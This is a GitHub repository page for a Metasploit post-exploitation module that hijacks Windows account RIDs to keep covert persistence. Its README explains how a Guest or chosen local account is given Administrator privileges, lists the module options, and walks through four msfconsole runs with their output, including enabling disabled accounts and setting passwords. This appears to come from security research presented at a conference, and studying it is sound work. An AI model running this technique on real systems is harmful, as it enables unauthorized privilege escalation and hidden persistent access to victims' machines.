Windows RID Hijacking persistence technique
Switch branches/tags
Nothing to show
Clone or download
Latest commit 85fefe6 Oct 7, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
slides/derbycon-8.0 Add Derbycon 8.0 slides Oct 7, 2018
README.md Update README.md Jul 16, 2018
rid_hijack.png Add files via upload Jul 14, 2018
rid_hijack.rb Add files via upload Jul 14, 2018

README.md

RID Hijacking: Maintaining Access on Windows Machines

Arsenal

The RID Hijacking hook, applicable to all Windows versions, allows setting desired privileges to an existent account in a stealthy manner by modifying some security attributes of an user.

By only using OS resources, it is possible to replace the RID of an user right before the access token is created. To automatize the attack, a Metasploit module was developed. It requires a meterpreter session against the victim.

Metasploit Module

post/windows/manage/rid_hijack

rid_hijack

Overview

This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine.

Taking advantage of some Windows Local Users Management integrity issues, this module will allow to authenticate with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.

By using a meterpreter session against a Windows host, the module will try to acquire SYSTEM privileges if needed, and will modify some attributes to hijack the permissions of an existing local account and set them to another one.

Vulnerable Software

This module has been tested against:

  • Windows XP, 2003. (32 bits)
  • Windows 8.1 Pro. (64 bits)
  • Windows 10. (64 bits)
  • Windows Server 2012. (64 bits)

This module was not tested against, but may work on:

  • Other versions of windows (x86 and x64).

Options

  • GETSYSTEM: Try to get SYSTEM privileges on the victim. Default: false

  • GUEST_ACCOUNT: Use the GUEST built-in account as the destination of the privileges to be hijacked. Set this account as the hijacker. Default: false.

  • SESSION: The session to run this module on. Default: none.

  • USERNAME: Set the user account (SAM Account Name) of the victim host which will be the destination of the privileges to be hijacked. Set this account as the hijacker. If GUEST_ACCOUNT option is set to true, this parameter will be ignored if defined. Default: none.

  • PASSWORD: Set or change the password of the account defined as the destination of the privileges to be hijacked, either GUEST account or the user account set in USERNAME option. Set password to the hijacker account. Default: none.

  • RID: Specify the RID number in decimal of the victim account. This number should be the RID of an existing account on the target host, no matter if it is disabled (i.e.: The RID of the Administrator built-in account is 500). Set the RID owned by the account that will be hijacked. Default: 500

Scenarios

Assigning Administrator privileges to Guest built-in account.

msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set SESSION 1
SESSION => 1
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[*] Account is disabled, activating...
[+] Target account enabled
[*] Overwriting RID
[+] The RID 500 is set to the account Invitado with original RID 501
[*] Post module execution completed

Results after login in as the Guest account.

guest_account

Assigning Administrator privileges to local custom account.

msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 500 is set to the account testuser with original RID 1002
[*] Post module execution completed

Results after login in as the testuser account.

testuser

Assigning custom privileges to Guest built-in account and setting new password to Guest.

msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set RID 1002
RID => 1002
msf post(rid_hijack) > set PASSWORD Password.1
PASSWORD => Password.1
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account Invitado with original RID 501
[*] Setting Invitado password to Password.1
[*] Post module execution completed

Assigning custom privileges to local custom account and setting new password to custom account.

msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > set PASSWORD Password.2
PASSWORD => Password.2
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account testuser with original RID 1002
[*] Setting testuser password to Password.2
[*] Post module execution completed

References

CSL LABS: RID Hijacking on Windows